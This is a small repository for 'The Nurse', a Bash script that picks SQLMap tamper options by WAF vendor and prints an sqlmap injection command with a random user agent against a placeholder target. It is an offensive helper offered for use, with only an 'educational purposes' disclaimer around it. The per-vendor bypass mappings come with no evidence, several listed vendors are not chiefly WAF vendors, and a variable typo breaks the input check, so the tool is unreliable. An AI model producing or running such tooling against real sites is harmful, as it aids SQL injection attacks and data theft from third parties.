├── LICENSE
├── README.md
└── the-nurse.sh


/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2023 emedina
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 |                  __
 2 |                 | +|
 3 |              ,,,|__|
 4 |              $$$ , ,
 5 |             $$C    >
 6 |            $$$;  _<
 7 |        _______/ /_        ___
 8 |       |  |__` \~/o\  _,]-]___]----->
 9 |       | /  \(  )  )\/.-//
10 |      _( \  )    / \  |
11 |       //| /   ,/   \/
12 |         '/   o \
13 |         /     o \
14 |        /______/\_\
15 |        \   ||   /
16 |         \  ||  /
17 |          \ || /
18 |          / )( \
19 |          |/  \|
20 |          :]  [:
21 |          o|  |o
22 |         /o|  |o\    
23 |         `-'  `-'`
24 | 
25 | # The Nurse
26 | ## A WAF Bypass SQLMap Tamper Assistant.
27 | 
28 | 
29 | This is a Bash script that helps with bypassing Web Application Firewalls (WAFs) using SQLMap tamper options. It provides a list of WAF vendors, prompts the user to select a vendor, and then suggests a set of useful tamper options for SQLMap that have been found to be effective against the selected vendor's WAF.
30 | 
31 | ## Usage
32 | To use the script, simply run it in a Bash terminal:
33 | 
34 | bash
35 | 
36 | ./the-nurse.sh
37 | 
38 | -The script will present a list of WAF vendors and prompt you to select a vendor. Once you have selected a vendor, the script will suggest a set of useful tamper options for SQLMap that can help bypass that vendor's WAF.
39 | 
40 | -The script will output the SQLMap command with the selected options, which you can then copy and paste into your terminal to execute the injection.
41 | 
42 | ## Dependencies
43 | 
44 | This script requires the following dependencies:
45 | 
46 | Bash (version 4 or later)
47 | SQLMap (version 1.0 or later)
48 | 
49 | Make sure that these dependencies are installed and available in your $PATH before running the script.
50 | 
51 | ## Disclaimer
52 | 
53 | This script is for educational purposes only. It is intended to help security researchers and penetration testers understand the limitations of WAFs and to help them test the effectiveness of their bypass techniques. Do not use this script for any illegal activities. The author of this script is not responsible for any damage or harm caused by its use.
54 | 


--------------------------------------------------------------------------------
/the-nurse.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | vendors=("Akamai" "Alert Logic" "Amazon Web Services (AWS)" "AppTrana" "Barracuda" "Cloudbric" "Cloudflare" "Comodo" "DenyAll" "F5 Networks" "Fortinet" "Imperva" "Incapsula" "Juniper Networks" "Microsoft Azure" "ModSecurity" "Neustar" "NSFOCUS" "Palo Alto Networks" "Radware" "Sophos" "Sucuri" "Symantec" "Wallarm" "WatchGuard" "WebARX" "WhiteHat Security" "Zenedge" "Trustwave" "SiteLock" "Tenable" "Qualys" "Rapid7")
 4 | 
 5 | # Print list of vendors
 6 | echo "Your best aid  when its about bypassing WAFs using sqlmap"
 7 | echo "Select the WAF vendor from the list below:"
 8 | for i in "${!vendors[@]}"; do
 9 |     echo "$i. ${vendors[$i]}"
10 | done
11 | 
12 | # Get user input for vendor
13 | while true; do
14 |     read -p "Enter the vendor number: " vendor_number
15 |     if [[ $vendoer_number -ge 0 && $vendor_number -lt ${#vendors[@]} ]]; then
16 |         vendor=${vendors[$vendor_number]}
17 |         break
18 |     fi
19 |     echo "Invalid option. Please try again."
20 | done
21 | 
22 | echo "You selected $vendor."
23 | 
24 | # Select useful tamper
25 | case $vendor in
26 |     "Akamai") useful_tamper="space2dash,randomcase";;
27 |     "Alert Logic") useful_tamper="randomcase,randomcomments";;
28 |     "Amazon Web Services (AWS)") useful_tamper="randomcomments,space2mssqlhash";;
29 |     "AppTrana") useful_tamper="space2mssqlhash,space2morehash";;
30 |     "Barracuda") useful_tamper="space2morehash,space2plus";;
31 |     "Cloudbric") useful_tamper="randomcase,space2comment";;
32 |     "Cloudflare") useful_tamper="luanginx,space2plus";;
33 |     "Comodo") useful_tamper="space2plus,space2mysqldash";;
34 |     "DenyAll") useful_tamper="space2comment,space2mssqlhash";;
35 |     "F5 Networks") useful_tamper="space2plus,space2mysqlblank";;
36 |     "Fortinet") useful_tamper="space2plus,space2randomblank";;
37 |     "Imperva") useful_tamper="space2morehash,randomcase";;
38 |     "Incapsula") useful_tamper="space2morehash,space2comment";;
39 |     "Juniper Networks") useful_tamper="randomcase,space2mssqlhash";;
40 |     "Microsoft Azure") useful_tamper="space2mssqlhash,space2comment";;
41 |     "ModSecurity") useful_tamper="space2mssqlhash,space2plus";;
42 |     "Neustar") useful_tamper="space2mssqlhash,space2mysqldash";;
43 |     "NSFOCUS") useful_tamper="randomcase,space2mysqlblank";;
44 |     "Palo Alto Networks") useful_tamper="space2mssqlhash,space2randomblank";;
45 |     "Radware") useful_tamper="space2comment,randomcase";;
46 |     "Sophos") useful_tamper="space2plus,space2mssqlhash";;
47 |     "Sucuri") useful_tamper="space2randomblank,space2comment";;
48 |     "Symantec") useful_tamper="randomcase,space2mysqldash";;
49 |     "Wallarm") useful_tamper="space2mssqlhash,space2mysqlblank";;
50 |     "WatchGuard") useful_tamper="space2mssqlhash,space2randomblank";;
51 |     "WebARX") useful_tamper="space2mssqlhash,randomcase";;
52 |     "WhiteHat Security") useful_tamper="space2comment,space2plus";;
53 |     "Zenedge") useful_tamper="space2comment,space2mssqlhash";;
54 |     "Trustwave") useful_tamper="randomcase,space2mysqldash";;
55 |     "SiteLock") useful_tamper="space2comment,space2mysqlblank";;
56 |     "Tenable") useful_tamper="space2plus,space2randomblank";;
57 |     "Qualys") useful_tamper="space2mysqlblank,randomcase";;
58 |     "Rapid7") useful_tamper="randomcase,space2mssqlhash";;
59 | esac
60 | 
61 | # SQLmap command with selected options
62 | echo "The nurse assisted you preparing the injection..."
63 | echo "SQLmap command for $vendor:"
64 | echo "sqlmap -u http://TARGET.com/page.php?id=1 --tamper=$useful_tamper --random-agent"
65 | echo "Good luck!!"
66 | 


--------------------------------------------------------------------------------